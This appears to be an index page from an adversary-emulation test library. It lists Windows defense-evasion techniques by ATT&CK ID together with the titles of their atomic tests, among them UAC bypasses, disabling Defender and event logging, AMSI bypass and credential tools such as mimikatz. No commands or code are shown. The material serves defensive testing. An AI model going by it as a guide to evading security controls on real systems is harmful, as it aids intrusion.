- [T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md)
- Atomic Test #1: Bypass UAC using Event Viewer (cmd) [windows]
- Atomic Test #2: Bypass UAC using Event Viewer (PowerShell) [windows]
- Atomic Test #3: Bypass UAC using Fodhelper [windows]
- Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows]
- Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- Atomic Test #8: Disable UAC using reg.exe [windows]
- Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
- Atomic Test #10: UACME Bypass Method 23 [windows]
- Atomic Test #11: UACME Bypass Method 31 [windows]
- Atomic Test #12: UACME Bypass Method 33 [windows]
- Atomic Test #13: UACME Bypass Method 34 [windows]
- Atomic Test #14: UACME Bypass Method 39 [windows]
- Atomic Test #15: UACME Bypass Method 56 [windows]
- Atomic Test #16: UACME Bypass Method 59 [windows]
- Atomic Test #17: UACME Bypass Method 61 [windows]
- Atomic Test #18: WinPwn - UAC Magic [windows]
- Atomic Test #19: WinPwn - UAC Bypass ccmstp technique [windows]
- Atomic Test #20: WinPwn - UAC Bypass DiskCleanup technique [windows]
- Atomic Test #21: WinPwn - UAC Bypass DccwBypassUAC technique [windows]
- Atomic Test #22: Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key [windows]
- Atomic Test #23: UAC Bypass with WSReset Registry Modification [windows]
- T1099 Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.001 System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
- Atomic Test #1: Service Registry Permissions Weakness [windows]
- Atomic Test #2: Service ImagePath Change with reg.exe [windows]
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1116 Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1218.013 Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1093 Process Hollowing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1036.005 Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
- Atomic Test #2: Masquerade as a built-in system executable [windows]
- T1036.008 Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1121 Regsvcs/Regasm [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1564 Hide Artifacts](../../T1564/T1564.md)
- Atomic Test #1: Extract binary files via VBA [windows]
- Atomic Test #2: Create a Hidden User Called "$" [windows]
- Atomic Test #3: Create an "Administrator " user (with a space on the end) [windows]
- Atomic Test #4: Create and Hide a Service with sc.exe [windows]
- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.009 Safe Mode Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #2: Detect Virtualization Environment (Windows) [windows]
- Atomic Test #4: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) [windows]
- [T1218.004 Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md)
- Atomic Test #1: CheckIfInstallable method call [windows]
- Atomic Test #2: InstallHelper method call [windows]
- Atomic Test #3: InstallUtil class constructor method call [windows]
- Atomic Test #4: InstallUtil Install method call [windows]
- Atomic Test #5: InstallUtil Uninstall method call - /U variant [windows]
- Atomic Test #6: InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant [windows]
- Atomic Test #7: InstallUtil HelpText method call [windows]
- Atomic Test #8: InstallUtil evasive invocation [windows]
- T1089 Disabling Security Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.008 Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.001 Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
- T1553.002 Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md)
- Atomic Test #1: Take ownership using takeown utility [windows]
- Atomic Test #2: cacls - Grant permission to specified user or group recursively [windows]
- Atomic Test #3: attrib - Remove read-only attribute [windows]
- Atomic Test #4: attrib - hide file [windows]
- Atomic Test #5: Grant Full Access to folder for Everyone - Ryuk Ransomware Style [windows]
- [T1218.007 Signed Binary Proxy Execution: Msiexec](../../T1218.007/T1218.007.md)
- Atomic Test #1: Msiexec.exe - Execute Local MSI file with embedded JScript [windows]
- Atomic Test #2: Msiexec.exe - Execute Local MSI file with embedded VBScript [windows]
- Atomic Test #3: Msiexec.exe - Execute Local MSI file with an embedded DLL [windows]
- Atomic Test #4: Msiexec.exe - Execute Local MSI file with an embedded EXE [windows]
- Atomic Test #5: WMI Win32_Product Class - Execute Local MSI file with embedded JScript [windows]
- Atomic Test #6: WMI Win32_Product Class - Execute Local MSI file with embedded VBScript [windows]
- Atomic Test #7: WMI Win32_Product Class - Execute Local MSI file with an embedded DLL [windows]
- Atomic Test #8: WMI Win32_Product Class - Execute Local MSI file with an embedded EXE [windows]
- Atomic Test #9: Msiexec.exe - Execute the DllRegisterServer function of a DLL [windows]
- Atomic Test #10: Msiexec.exe - Execute the DllUnregisterServer function of a DLL [windows]
- Atomic Test #11: Msiexec.exe - Execute Remote MSI file [windows]
- [T1556.002 Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md)
- Atomic Test #1: Install and Register Password Filter DLL [windows]
- T1070.007 Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.003 Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md)
- Atomic Test #10: Prevent Powershell History Logging [windows]
- Atomic Test #11: Clear Powershell History by Deleting History File [windows]
- Atomic Test #12: Set Custom AddToHistoryHandler to Avoid History File Logging [windows]
- [T1202 Indirect Command Execution](../../T1202/T1202.md)
- Atomic Test #1: Indirect Command Execution - pcalua.exe [windows]
- Atomic Test #2: Indirect Command Execution - forfiles.exe [windows]
- Atomic Test #3: Indirect Command Execution - conhost.exe [windows]
- [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
- Atomic Test #1: Deobfuscate/Decode Files Or Information [windows]
- Atomic Test #2: Certutil Rename and Decode [windows]
- [T1562 Impair Defenses](../../T1562/T1562.md)
- Atomic Test #1: Windows Disable LSA Protection [windows]
- [T1055.003 Thread Execution Hijacking](../../T1055.003/T1055.003.md)
- Atomic Test #1: Thread Execution Hijacking [windows]
- [T1036 Masquerading](../../T1036/T1036.md)
- Atomic Test #1: System File Copied to Unusual Location [windows]
- Atomic Test #2: Malware Masquerading and Execution from Zip File [windows]
- [T1070.008 Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md)
- Atomic Test #1: Copy and Delete Mailbox Data on Windows [windows]
- Atomic Test #4: Copy and Modify Mailbox Data on Windows [windows]
- [T1055 Process Injection](../../T1055/T1055.md)
- Atomic Test #1: Shellcode execution via VBA [windows]
- Atomic Test #2: Remote Process Injection in LSASS via mimikatz [windows]
- Atomic Test #3: Section View Injection [windows]
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218 Signed Binary Proxy Execution](../../T1218/T1218.md)
- Atomic Test #1: mavinject - Inject DLL into running process [windows]
- Atomic Test #2: Register-CimProvider - Execute evil dll [windows]
- Atomic Test #3: InfDefaultInstall.exe .inf Execution [windows]
- Atomic Test #4: ProtocolHandler.exe Downloaded a Suspicious File [windows]
- Atomic Test #5: Microsoft.Workflow.Compiler.exe Payload Execution [windows]
- Atomic Test #6: Renamed Microsoft.Workflow.Compiler.exe Payload Executions [windows]
- Atomic Test #7: Invoke-ATHRemoteFXvGPUDisablementCommand base test [windows]
- Atomic Test #8: DiskShadow Command Execution [windows]
- Atomic Test #9: Load Arbitrary DLL via Wuauclt (Windows Update Client) [windows]
- Atomic Test #10: Lolbin Gpscript logon option [windows]
- Atomic Test #11: Lolbin Gpscript startup option [windows]
- Atomic Test #12: Lolbas ie4uinit.exe use as proxy [windows]
- T1038 DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.006 Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md)
- Atomic Test #5: Windows - Modify file creation timestamp with PowerShell [windows]
- Atomic Test #6: Windows - Modify file last modified timestamp with PowerShell [windows]
- Atomic Test #7: Windows - Modify file last access timestamp with PowerShell [windows]
- Atomic Test #8: Windows - Timestomp a File [windows]
- [T1620 Reflective Code Loading](../../T1620/T1620.md)
- Atomic Test #1: WinPwn - Reflectively load Mimik@tz into memory [windows]
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.003 Signed Binary Proxy Execution: CMSTP](../../T1218.003/T1218.003.md)
- Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
- Atomic Test #2: CMSTP Executing UAC Bypass [windows]
- [T1562.002 Impair Defenses: Disable Windows Event Logging](../../T1562.002/T1562.002.md)
- Atomic Test #1: Disable Windows IIS HTTP Logging [windows]
- Atomic Test #2: Disable Windows IIS HTTP Logging via PowerShell [windows]
- Atomic Test #3: Kill Event Log Service Threads [windows]
- Atomic Test #4: Impair Windows Audit Log Policy [windows]
- Atomic Test #5: Clear Windows Audit Policy Config [windows]
- Atomic Test #6: Disable Event Logging with wevtutil [windows]
- Atomic Test #7: Makes Eventlog blind with Phant0m [windows]
- [T1218.002 Signed Binary Proxy Execution: Control Panel](../../T1218.002/T1218.002.md)
- Atomic Test #1: Control Panel Items [windows]
- T1009 Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.004 Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md)
- Atomic Test #1: Disable Microsoft Defender Firewall [windows]
- Atomic Test #2: Disable Microsoft Defender Firewall via Registry [windows]
- Atomic Test #3: Allow SMB and RDP on Microsoft Defender Firewall [windows]
- Atomic Test #4: Opening ports for proxy - HARDRAIN [windows]
- Atomic Test #5: Open a local port through Windows Firewall to any profile [windows]
- Atomic Test #6: Allow Executable Through Firewall Located in Non-Standard Location [windows]
- Atomic Test #18: LockBit Black - Unusual Windows firewall registry modification -cmd [windows]
- Atomic Test #19: LockBit Black - Unusual Windows firewall registry modification -Powershell [windows]
- Atomic Test #20: Blackbit - Disable Windows Firewall using netsh firewall [windows]
- T1553.003 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1207 Rogue Domain Controller](../../T1207/T1207.md)
- Atomic Test #1: DCShadow (Active Directory) [windows]
- T1553.006 Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1107 File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1112 Modify Registry](../../T1112/T1112.md)
- Atomic Test #1: Modify Registry of Current User Profile - cmd [windows]
- Atomic Test #2: Modify Registry of Local Machine - cmd [windows]
- Atomic Test #3: Modify registry to store logon credentials [windows]
- Atomic Test #4: Add domain to Trusted sites Zone [windows]
- Atomic Test #5: Javascript in registry [windows]
- Atomic Test #6: Change Powershell Execution Policy to Bypass [windows]
- Atomic Test #7: BlackByte Ransomware Registry Changes - CMD [windows]
- Atomic Test #8: BlackByte Ransomware Registry Changes - Powershell [windows]
- Atomic Test #9: Disable Windows Registry Tool [windows]
- Atomic Test #10: Disable Windows CMD application [windows]
- Atomic Test #11: Disable Windows Task Manager application [windows]
- Atomic Test #12: Disable Windows Notification Center [windows]
- Atomic Test #13: Disable Windows Shutdown Button [windows]
- Atomic Test #14: Disable Windows LogOff Button [windows]
- Atomic Test #15: Disable Windows Change Password Feature [windows]
- Atomic Test #16: Disable Windows Lock Workstation Feature [windows]
- Atomic Test #17: Activate Windows NoDesktop Group Policy Feature [windows]
- Atomic Test #18: Activate Windows NoRun Group Policy Feature [windows]
- Atomic Test #19: Activate Windows NoFind Group Policy Feature [windows]
- Atomic Test #20: Activate Windows NoControlPanel Group Policy Feature [windows]
- Atomic Test #21: Activate Windows NoFileMenu Group Policy Feature [windows]
- Atomic Test #22: Activate Windows NoClose Group Policy Feature [windows]
- Atomic Test #23: Activate Windows NoSetTaskbar Group Policy Feature [windows]
- Atomic Test #24: Activate Windows NoTrayContextMenu Group Policy Feature [windows]
- Atomic Test #25: Activate Windows NoPropertiesMyDocuments Group Policy Feature [windows]
- Atomic Test #26: Hide Windows Clock Group Policy Feature [windows]
- Atomic Test #27: Windows HideSCAHealth Group Policy Feature [windows]
- Atomic Test #28: Windows HideSCANetwork Group Policy Feature [windows]
- Atomic Test #29: Windows HideSCAPower Group Policy Feature [windows]
- Atomic Test #30: Windows HideSCAVolume Group Policy Feature [windows]
- Atomic Test #31: Windows Modify Show Compress Color And Info Tip Registry [windows]
- Atomic Test #32: Windows Powershell Logging Disabled [windows]
- Atomic Test #33: Windows Add Registry Value to Load Service in Safe Mode without Network [windows]
- Atomic Test #34: Windows Add Registry Value to Load Service in Safe Mode with Network [windows]
- Atomic Test #35: Disable Windows Toast Notifications [windows]
- Atomic Test #36: Disable Windows Security Center Notifications [windows]
- Atomic Test #37: Suppress Win Defender Notifications [windows]
- Atomic Test #38: Allow RDP Remote Assistance Feature [windows]
- Atomic Test #39: NetWire RAT Registry Key Creation [windows]
- Atomic Test #40: Ursnif Malware Registry Key Creation [windows]
- Atomic Test #41: Terminal Server Client Connection History Cleared [windows]
- Atomic Test #42: Disable Windows Error Reporting Settings [windows]
- Atomic Test #43: DisallowRun Execution Of Certain Applications [windows]
- Atomic Test #44: Enabling Restricted Admin Mode via Command_Prompt [windows]
- Atomic Test #45: Mimic Ransomware - Enable Multiple User Sessions [windows]
- Atomic Test #46: Mimic Ransomware - Allow Multiple RDP Sessions per User [windows]
- Atomic Test #47: Event Viewer Registry Modification - Redirection URL [windows]
- Atomic Test #48: Event Viewer Registry Modification - Redirection Program [windows]
- Atomic Test #49: Enabling Remote Desktop Protocol via Remote Registry [windows]
- Atomic Test #50: Disable Win Defender Notification [windows]
- Atomic Test #51: Disable Windows OS Auto Update [windows]
- Atomic Test #52: Disable Windows Auto Reboot for current logon user [windows]
- Atomic Test #53: Windows Auto Update Option to Notify before download [windows]
- Atomic Test #54: Do Not Connect To Win Update [windows]
- Atomic Test #55: Tamper Win Defender Protection [windows]
- Atomic Test #56: Snake Malware Registry Blob [windows]
- [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
- Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
- T1027.001 Obfuscated Files or Information: Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1484.001 Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md)
- Atomic Test #1: LockBit Black - Modify Group policy settings -cmd [windows]
- Atomic Test #2: LockBit Black - Modify Group policy settings -Powershell [windows]
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
- Atomic Test #2: Activate Guest Account [windows]
- T1183 Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1085 Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.001 Indicator Removal on Host: Clear Windows Event Logs](../../T1070.001/T1070.001.md)
- Atomic Test #1: Clear Logs [windows]
- Atomic Test #2: Delete System Logs Using Clear-EventLog [windows]
- Atomic Test #3: Clear Event Logs via VBA [windows]
- T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1134.002 Create Process with Token](../../T1134.002/T1134.002.md)
- Atomic Test #1: Access Token Manipulation [windows]
- Atomic Test #2: WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique [windows]
- T1117 Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1054 Indicator Blocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.008 Signed Binary Proxy Execution: Odbcconf](../../T1218.008/T1218.008.md)
- Atomic Test #1: Odbcconf.exe - Execute Arbitrary DLL [windows]
- Atomic Test #2: Odbcconf.exe - Load Response File [windows]
- T1045 Software Packing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1198 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.006 Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md)
- Atomic Test #3: Disable Powershell ETW Provider - Windows [windows]
- Atomic Test #4: Disable .NET Event Tracing for Windows Via Registry (cmd) [windows]
- Atomic Test #5: Disable .NET Event Tracing for Windows Via Registry (powershell) [windows]
- Atomic Test #6: LockBit Black - Disable the ETW Provider of Windows Defender -cmd [windows]
- Atomic Test #7: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell [windows]
- T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070 Indicator Removal on Host](../../T1070/T1070.md)
- Atomic Test #1: Indicator Removal using FSUtil [windows]
- [T1550.003 Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md)
- Atomic Test #1: Mimikatz Kerberos Ticket Attack [windows]
- Atomic Test #2: Rubeus Kerberos Pass The Ticket [windows]
- [T1036.004 Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md)
- Atomic Test #1: Creating W32Time similar named service using schtasks [windows]
- Atomic Test #2: Creating W32Time similar named service using sc [windows]
- [T1055.004 Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
- Atomic Test #1: Process Injection via C# [windows]
- T1191 CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md)
- Atomic Test #1: Mount ISO image [windows]
- Atomic Test #2: Mount an ISO image and run executable from the ISO [windows]
- Atomic Test #3: Remove the Zone.Identifier alternate data stream [windows]
- Atomic Test #4: Execute LNK file from ISO [windows]
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1218.012 Verclsid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.010 Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.005 Signed Binary Proxy Execution: Mshta](../../T1218.005/T1218.005.md)
- Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
- Atomic Test #2: Mshta executes VBScript to execute malicious command [windows]
- Atomic Test #3: Mshta Executes Remote HTML Application (HTA) [windows]
- Atomic Test #4: Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement [windows]
- Atomic Test #5: Invoke HTML Application - Jscript Engine Simulating Double Click [windows]
- Atomic Test #6: Invoke HTML Application - Direct download from URI [windows]
- Atomic Test #7: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler [windows]
- Atomic Test #8: Invoke HTML Application - JScript Engine with Inline Protocol Handler [windows]
- Atomic Test #9: Invoke HTML Application - Simulate Lateral Movement over UNC Path [windows]
- Atomic Test #10: Mshta used to Execute PowerShell [windows]
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1134.001 Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md)
- Atomic Test #1: Named pipe client impersonation [windows]
- Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
- Atomic Test #3: Launch NSudo Executable [windows]
- Atomic Test #4: Bad Potato [windows]
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1564.002 Hide Artifacts: Hidden Users](../../T1564.002/T1564.002.md)
- Atomic Test #3: Create Hidden User in Registry [windows]
- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1196 Control Panel Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.003 Impair Defenses: HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1134.004 Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md)
- Atomic Test #1: Parent PID Spoofing using PowerShell [windows]
- Atomic Test #2: Parent PID Spoofing - Spawn from Current Process [windows]
- Atomic Test #3: Parent PID Spoofing - Spawn from Specified Process [windows]
- Atomic Test #4: Parent PID Spoofing - Spawn from svchost.exe [windows]
- Atomic Test #5: Parent PID Spoofing - Spawn from New Process [windows]
- T1122 Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1502 Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1170 Mshta [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.001 Signed Binary Proxy Execution: Compiled HTML File](../../T1218.001/T1218.001.md)
- Atomic Test #1: Compiled HTML Help Local Payload [windows]
- Atomic Test #2: Compiled HTML Help Remote Payload [windows]
- Atomic Test #3: Invoke CHM with default Shortcut Command Execution [windows]
- Atomic Test #4: Invoke CHM with InfoTech Storage Protocol Handler [windows]
- Atomic Test #5: Invoke CHM Simulate Double click [windows]
- Atomic Test #6: Invoke CHM with Script Engine and Help Topic [windows]
- Atomic Test #7: Invoke CHM Shortcut Command with ITS and Help Topic [windows]
- Atomic Test #8: Decompile Local CHM File [windows]
- [T1070.005 Indicator Removal on Host: Network Share Connection Removal](../../T1070.005/T1070.005.md)
- Atomic Test #1: Add Network Share [windows]
- Atomic Test #2: Remove Network Share [windows]
- Atomic Test #3: Remove Network Share PowerShell [windows]
- Atomic Test #4: Disable Administrative Share Creation at Startup [windows]
- Atomic Test #5: Remove Administrative Shares [windows]
- [T1562.001 Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md)
- Atomic Test #10: Unload Sysmon Filter Driver [windows]
- Atomic Test #11: Uninstall Sysmon [windows]
- Atomic Test #12: AMSI Bypass - AMSI InitFailed [windows]
- Atomic Test #13: AMSI Bypass - Remove AMSI Provider Reg Key [windows]
- Atomic Test #14: Disable Arbitrary Security Windows Service [windows]
- Atomic Test #15: Tamper with Windows Defender ATP PowerShell [windows]
- Atomic Test #16: Tamper with Windows Defender Command Prompt [windows]
- Atomic Test #17: Tamper with Windows Defender Registry [windows]
- Atomic Test #18: Disable Microsoft Office Security Features [windows]
- Atomic Test #19: Remove Windows Defender Definition Files [windows]
- Atomic Test #20: Stop and Remove Arbitrary Security Windows Service [windows]
- Atomic Test #21: Uninstall Crowdstrike Falcon on Windows [windows]
- Atomic Test #22: Tamper with Windows Defender Evade Scanning -Folder [windows]
- Atomic Test #23: Tamper with Windows Defender Evade Scanning -Extension [windows]
- Atomic Test #24: Tamper with Windows Defender Evade Scanning -Process [windows]
- Atomic Test #26: Disable Windows Defender with DISM [windows]
- Atomic Test #27: Disable Defender Using NirSoft AdvancedRun [windows]
- Atomic Test #28: Kill antimalware protected processes using Backstab [windows]
- Atomic Test #29: WinPwn - Kill the event log services for stealth [windows]
- Atomic Test #30: Tamper with Windows Defender ATP using Aliases - PowerShell [windows]
- Atomic Test #31: LockBit Black - Disable Privacy Settings Experience Using Registry -cmd [windows]
- Atomic Test #32: LockBit Black - Use Registry Editor to turn on automatic logon -cmd [windows]
- Atomic Test #33: LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell [windows]
- Atomic Test #34: Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell [windows]
- Atomic Test #35: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature [windows]
- Atomic Test #36: WMIC Tamper with Windows Defender Evade Scanning Folder [windows]
- Atomic Test #37: Delete Windows Defender Scheduled Tasks [windows]
- Atomic Test #43: Disable Hypervisor-Enforced Code Integrity (HVCI) [windows]
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1073 DLL Side-Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1055.012 Process Injection: Process Hollowing](../../T1055.012/T1055.012.md)
- Atomic Test #1: Process Hollowing using PowerShell [windows]
- Atomic Test #2: RunPE via VBA [windows]
- [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
- Atomic Test #2: Execute base64-encoded PowerShell [windows]
- Atomic Test #3: Execute base64-encoded PowerShell from Windows Registry [windows]
- Atomic Test #4: Execution from Compressed File [windows]
- Atomic Test #5: DLP Evasion via Sensitive Data in VBA Macro over email [windows]
- Atomic Test #6: DLP Evasion via Sensitive Data in VBA Macro over HTTP [windows]
- Atomic Test #7: Obfuscated Command in PowerShell [windows]
- Atomic Test #8: Obfuscated Command Line using special Unicode characters [windows]
- Atomic Test #9: Snake Malware Encrypted crmlog file [windows]
- Atomic Test #10: Execution from Compressed JScript File [windows]
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.001 Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1564.006 Run Virtual Instance](../../T1564.006/T1564.006.md)
- Atomic Test #1: Register Portable Virtualbox [windows]
- Atomic Test #2: Create and start VirtualBox virtual machine [windows]
- Atomic Test #3: Create and start Hyper-V virtual machine [windows]
- [T1134.005 Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md)
- Atomic Test #1: Injection SID-History with mimikatz [windows]
- T1553 Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.010 Signed Binary Proxy Execution: Regsvr32](../../T1218.010/T1218.010.md)
- Atomic Test #1: Regsvr32 local COM scriptlet execution [windows]
- Atomic Test #2: Regsvr32 remote COM scriptlet execution [windows]
- Atomic Test #3: Regsvr32 local DLL execution [windows]
- Atomic Test #4: Regsvr32 Registering Non DLL [windows]
